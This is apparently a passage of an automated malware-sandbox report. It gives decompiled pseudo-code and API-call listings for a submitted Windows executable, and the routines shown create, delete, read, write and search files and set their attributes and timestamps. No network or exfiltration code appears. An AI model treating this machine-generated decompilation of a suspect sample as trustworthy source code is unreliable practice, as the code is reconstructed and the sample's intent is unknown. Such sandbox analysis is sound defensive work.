                              				_push( *((intOrPtr*)(E00402634(_t47 - 0x18, _t41))));
                              				 *(_t47 - 4) = 0;
                              				_t22 = E00405841(__ecx + 0x20, _t41); // executed
                              				asm("sbb bl, bl");
                              				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
                              				E00403A9C( *((intOrPtr*)(_t47 - 0x18)));
                              				if( ~_t22 + 1 != 0) {
                              					 *((intOrPtr*)(_t47 + 8)) = 1;
                              					E00413D3D(_t47 + 8, 0x41c4c0);
                              				}
                              				_t24 = E004042D6();
                              				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
                              				 *((intOrPtr*)(_t45 + 0x88)) = 0;
                              				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
                              				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                              				return _t24;
                              			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 004092EE
                                • Part of subcall function 00402634: __EH_prolog.LIBCMT ref: 00402639
                                • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ExceptionRaise
                              • String ID:
                              • API String ID: 2062786585-0
                              • Opcode ID: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                              • Instruction ID: f7fbb3e9a8787d76bf0f9f15101cef5fd9d7ebfa1ebb25f778e30044bb5e9d70
                              • Opcode Fuzzy Hash: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                              • Instruction Fuzzy Hash: 7B01D6766406049ACB10EF25C451ADEBBB1FF95318F00852FE896632E1CB785649CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 64%
                              			E00404D6C(void* __ecx) {
                              				signed char _t18;
                              				intOrPtr* _t24;
                              				void* _t25;
                              				void* _t27;
                              				void* _t30;
                              				void* _t41;
                              
                              				E00413954(E004195F0, _t41);
                              				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                              				_t18 =  *(__ecx + 0x20) >> 4;
                              				_t46 = _t18 & 0x00000001;
                              				if((_t18 & 0x00000001) == 0) {
                              					_t30 = __ecx + 0x28;
                              					__eflags = _t30;
                              					_push(_t30);
                              					_t27 = E00404BDC( *((intOrPtr*)(E00405417(_t41 - 0x18, _t41 + 8))), __eflags);
                              					_push( *((intOrPtr*)(_t41 - 0x18)));
                              				} else {
                              					_push(__ecx + 0x28);
                              					_t24 = E00405417(_t41 - 0x18, _t41 + 8);
                              					 *(_t41 - 4) = 1;
                              					_t25 = E00404C4A(_t24, _t46); // executed
                              					_t27 = _t25;
                              					_push( *((intOrPtr*)(_t41 - 0x18)));
                              				}
                              				E00403A9C();
                              				E00403A9C( *((intOrPtr*)(_t41 + 8)));
                              				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                              				return _t27;
                              			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 00404D71
                                • Part of subcall function 00405417: __EH_prolog.LIBCMT ref: 0040541C
                                • Part of subcall function 00404C4A: __EH_prolog.LIBCMT ref: 00404C4F
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                              • Instruction ID: f66e6ca9409e8e8da17af4a7d05db337a423f76100d3163e29410ef6f876c1fe
                              • Opcode Fuzzy Hash: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                              • Instruction Fuzzy Hash: 4901A2B25101049ACB09EF90C852BED7B70EF94308F00412FE505776D2DB395A99CA48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004027A6(void* __ecx) {
                              				void* _t17;
                              				signed int _t31;
                              				intOrPtr _t34;
                              				void* _t36;
                              
                              				E00413954(E0041919C, _t36);
                              				E00401CE1(_t36 - 0x18, __ecx + 0x10);
                              				_t34 =  *((intOrPtr*)(_t36 + 8));
                              				_t31 = 0;
                              				 *((intOrPtr*)(_t36 - 4)) = 0;
                              				if( *((intOrPtr*)(_t34 + 8)) > 0) {
                              					do {
                              						E00401DE3(_t36 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc)) + _t31 * 4)));
                              						E0040499C( *((intOrPtr*)(_t36 - 0x18))); // executed
                              						E00401DB8(_t36 - 0x18, 0x5c);
                              						_t31 = _t31 + 1;
                              					} while (_t31 <  *((intOrPtr*)(_t34 + 8)));
                              				}
                              				_t17 = E00403A9C( *((intOrPtr*)(_t36 - 0x18)));
                              				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                              				return _t17;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                              • Instruction ID: 116dfd3529ede02fc162d870fedee277598c738aed7d6567ac0ffa60a71ea666
                              • Opcode Fuzzy Hash: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                              • Instruction Fuzzy Hash: BCF04F719005069BDB15EB9AC892AEFBBB5FF80308F00403FE142775E2CA787985DB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004048B7(WCHAR* __ecx, long __edx) {
                              				char _v16;
                              				void* __ebp;
                              				signed int _t5;
                              				void* _t9;
                              
                              				if( *0x423148 != 0) {
                              					_t5 = SetFileAttributesW(__ecx, __edx); // executed
                              					return _t5 & 0xffffff00 | _t5 != 0x00000000;
                              				}
                              				_t9 = E0040489C( *((intOrPtr*)(E004048FF( &_v16, __ecx))), __edx);
                              				E00403A9C(_v16);
                              				return _t9;
                              			}

                              APIs
                              • SetFileAttributesW.KERNELBASE ref: 004048F1
                                • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$Attributes$ApisH_prolog
                              • String ID:
                              • API String ID: 3885834519-0
                              • Opcode ID: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                              • Instruction ID: d8abee0b5bf8aaacd3c7805e8248c04f8c14d25ec22198af343fb12e16f398c4
                              • Opcode Fuzzy Hash: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                              • Instruction Fuzzy Hash: 76E02B66F002502BC7103BA5AC065DB3B9D9B81314B20C43BA602A3291E9388E44A258
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040499C(WCHAR* __ecx) {
                              				char _v16;
                              				void* __ebp;
                              				signed int _t5;
                              				void* _t8;
                              
                              				if( *0x423148 != 0) {
                              					_t5 = CreateDirectoryW(__ecx, 0); // executed
                              					return _t5 & 0xffffff00 | _t5 != 0x00000000;
                              				} else {
                              					_t8 = E0040498D( *((intOrPtr*)(E004048FF( &_v16, __ecx))));
                              					E00403A9C(_v16);
                              					return _t8;
                              				}
                              			}

                              APIs
                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000), ref: 004049D0
                                • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                • Part of subcall function 0040498D: CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CreateDirectory$ApisFileH_prolog
                              • String ID:
                              • API String ID: 1021588753-0
                              • Opcode ID: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                              • Instruction ID: 2f64d7a75cdf7ff6db5ed191fdbb19fa086d8aebc57dacf92a4c812467fb8a6f
                              • Opcode Fuzzy Hash: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                              • Instruction Fuzzy Hash: 18E0DFA0B002002BCB147B79AC0679E376D4B80218F10867EA652671E1EA7999449608
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004050AB(CHAR* __ecx, CHAR* __edx, CHAR** _a4) {
                              				int _t4;
                              				CHAR* _t8;
                              				CHAR* _t13;
                              				CHAR** _t15;
                              
                              				_t15 = _a4;
                              				_t13 = __edx;
                              				_t8 = __ecx;
                              				if(_t15[2] <= 0x105) {
                              					E0040243E(_t15, 0x105);
                              				}
                              				_t4 = GetTempFileNameA(_t8, _t13, 0,  *_t15); // executed
                              				E00404296(_t15);
                              				return _t4;
                               			}

                              APIs
                              • GetTempFileNameA.KERNELBASE(?,?,00000000,00000003,?,?,00000000,004050FF,?,?,?,00405160,?,?,?,00000003), ref: 004050CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileNameTemp
                              • String ID:
                              • API String ID: 745986568-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E004058CD(void* __ecx, void* __edx, void* __eflags) {
                              				void* _t10;
                              				void* _t25;
                              
                              				E00413954(E00419718, _t25);
                              				E00404D51(_t25 - 0x44);
                              				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                              				_push(__ecx);
                              				_t10 = E00405806(_t25 - 0x44, __edx); // executed
                              				E00403A9C( *((intOrPtr*)(_t25 - 0x1c)));
                              				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
                              				return _t10;
                               			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 004058D2
                                • Part of subcall function 00405806: __EH_prolog.LIBCMT ref: 0040580B
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00405C87(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
                              				long _v8;
                              				long _t12;
                              				signed int _t14;
                              				void** _t16;
                              
                              				_t16 = __ecx;
                              				_push(__ecx);
                              				_t12 =  *0x42045c; // 0x400000
                              				if(_a8 > _t12) {
                              					_a8 = _t12;
                              				}
                              				_v8 = _v8 & 0x00000000;
                              				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
                              				 *_a12 = _v8;
                              				return _t14 & 0xffffff00 | _t14 != 0x00000000;
                               			}

                              APIs
                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00405CAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004057CF(void** __ecx, intOrPtr _a4) {
                              				struct _WIN32_FIND_DATAA _v324;
                              				int _t7;
                              				signed int _t10;
                              				signed int _t11;
                              
                              				_t7 = FindNextFileA( *__ecx,  &_v324); // executed
                              				_t11 = _t10 & 0xffffff00 | _t7 != 0x00000000;
                              				_t16 = _t11;
                              				if(_t11 != 0) {
                              					E0040557F( &_v324, _a4, _t16);
                              				}
                              				return _t11;
                               			}

                              APIs
                              • FindNextFileA.KERNELBASE(000000FF,?,00000000), ref: 004057E2
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileFindNext
                              • String ID:
                              • API String ID: 2029273394-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00405841(void* __ecx, void* __edx) {
                              				void* _t11;
                              				void* _t22;
                              
                              				E00413954(E004196F0, _t22);
                              				_push(__ecx);
                              				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
                              				_t3 = _t22 - 4;
                              				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                              				_t11 = E004055DE(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
                              				E0040551A(_t22 - 0x10);
                              				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
                              				return _t11;
                               			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 004055DE: __EH_prolog.LIBCMT ref: 004055E3
                                • Part of subcall function 004055DE: FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FindH_prolog$CloseFileFirst
                              • String ID:
                              • API String ID: 2004497850-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00405806(void* __ecx, void* __edx) {
                              				void* _t11;
                              				void* _t22;
                              
                              				E00413954(E004196DC, _t22);
                              				_push(__ecx);
                              				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
                              				_t3 = _t22 - 4;
                              				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                              				_t11 = E0040553A(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
                              				E0040551A(_t22 - 0x10);
                              				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
                              				return _t11;
                               			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040580B
                                • Part of subcall function 0040553A: FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirstH_prolog
                              • String ID:
                              • API String ID: 889498515-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E0040F8C3(intOrPtr* __ecx, void* __eflags) {
                              				void* _t8;
                              				void* _t17;
                              				intOrPtr _t19;
                              
                              				E00413954(E0041A808, _t17);
                              				_push(__ecx);
                              				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
                              				 *((intOrPtr*)(_t17 - 0x10)) = _t19;
                              				_t8 = E0040F648(__ecx, __eflags,  *((intOrPtr*)(_t17 + 8))); // executed
                              				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
                              				return _t8;
                               			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040F8C8
                                • Part of subcall function 0040F648: __EH_prolog.LIBCMT ref: 0040F64D
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00405B7B(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
                              				long _v8;
                              				signed int _t11;
                              
                              				_push(__ecx);
                              				_v8 = _v8 & 0x00000000;
                              				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
                              				 *_a12 = _v8;
                              				return _t11 & 0xffffff00 | _t11 != 0x00000000;
                               			}

                              APIs
                              • ReadFile.KERNELBASE(000000FF,00000000,?,?,00000000,000000FF,?,00405BC6,00000000,?,00000000,?,00405BEC,00000000,?,00000000), ref: 00405B91
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040551A(void** __ecx) {
                              				void* _t1;
                              				int _t3;
                              				signed int* _t6;
                              
                              				_t6 = __ecx;
                              				_t1 =  *__ecx;
                              				if(_t1 == 0xffffffff) {
                              					L4:
                              					return 1;
                              				} else {
                              					_t3 = FindClose(_t1); // executed
                              					if(_t3 != 0) {
                              						 *_t6 =  *_t6 | 0xffffffff;
                              						goto L4;
                              					} else {
                              						return 0;
                              					}
                              				}
                               			}

                              APIs
                              • FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CloseFind
                              • String ID:
                              • API String ID: 1863332320-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405A63(void** __ecx) {
                              				void* _t1;
                              				int _t3;
                              				signed int* _t6;
                              
                              				_t6 = __ecx;
                              				_t1 =  *__ecx;
                              				if(_t1 == 0xffffffff) {
                              					L4:
                              					return 1;
                              				} else {
                              					_t3 = FindCloseChangeNotification(_t1); // executed
                              					if(_t3 != 0) {
                              						 *_t6 =  *_t6 | 0xffffffff;
                              						goto L4;
                              					} else {
                              						return 0;
                              					}
                              				}
                               			}

                              APIs
                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00405A2C,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A6E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                              • Instruction ID: 8a38a6d9813b312501c47e0c29c9a2f8cf12ac5fa7676fc4773f80372e0f1af5
                              • Opcode Fuzzy Hash: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                              • Instruction Fuzzy Hash: 5CD0C93160462146CA645E3C7C849D737D89A16330325176AF0B5D22E4D3748D875E94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00404BDC(CHAR* __ecx, void* __eflags) {
                              				void* _t3;
                              				signed int _t4;
                              
                              				_t3 = E0040489C(__ecx, 0);
                              				if(_t3 != 0) {
                              					_t4 = DeleteFileA(__ecx); // executed
                              					return _t4 & 0xffffff00 | _t4 != 0x00000000;
                              				} else {
                              					return _t3;
                              				}
                              			}






                              APIs
                                • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              • DeleteFileA.KERNELBASE(?,?,00404DBF,?,00000000,?,?,?,?,?,00000000), ref: 00404BED
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: File$AttributesDelete
                              • String ID:
                              • API String ID: 2910425767-0
                              • Opcode ID: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                              • Instruction ID: 9a45e8f854b003a178289988cc7fc064ae5902da4cc88310474d582750e90668
                              • Opcode Fuzzy Hash: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                              • Instruction Fuzzy Hash: 0BC08C26209231439A043ABA3805ACB171E0EC122030AC0BBB800A2059CB288DC221DC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E00405C5A(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
                              				signed int _t4;
                              
                              				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
                              				asm("sbb eax, eax");
                              				return  ~( ~_t4);
                              			}





                              APIs
                              • SetFileTime.KERNELBASE(?,?,?,?,00405C84,00000000,00000000,?,00402E12,?), ref: 00405C68
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileTime
                              • String ID:
                              • API String ID: 1425588814-0
                              • Opcode ID: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                              • Instruction ID: 87fe90df0bd66b56430cb58ce5188ab21e49bedd0782b4bf3c7b48ca6ef22eff
                              • Opcode Fuzzy Hash: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                              • Instruction Fuzzy Hash: 8EC04C36158105FF8F020F70CC04C5EBFA2EB99711F10C918B269C40B0C7328024EB02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040489C(CHAR* __ecx, long __edx) {
                              				signed int _t3;
                              
                              				_t3 = SetFileAttributesA(__ecx, __edx); // executed
                              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                              			}





                              APIs
                              • SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                              • Instruction ID: c0231da6564a4fbd22ddd4f059f5cfeb57e5ba4ab4dd36146b68eeddd1056acd
                              • Opcode Fuzzy Hash: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                              • Instruction Fuzzy Hash: 5BA002A03112059BA6145B315E0AB6F296DEDC9AE1705C56C7412C5060EB29C9505565
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040498D(CHAR* __ecx) {
                              				signed int _t3;
                              
                              				_t3 = CreateDirectoryA(__ecx, 0); // executed
                              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                              			}





                              APIs
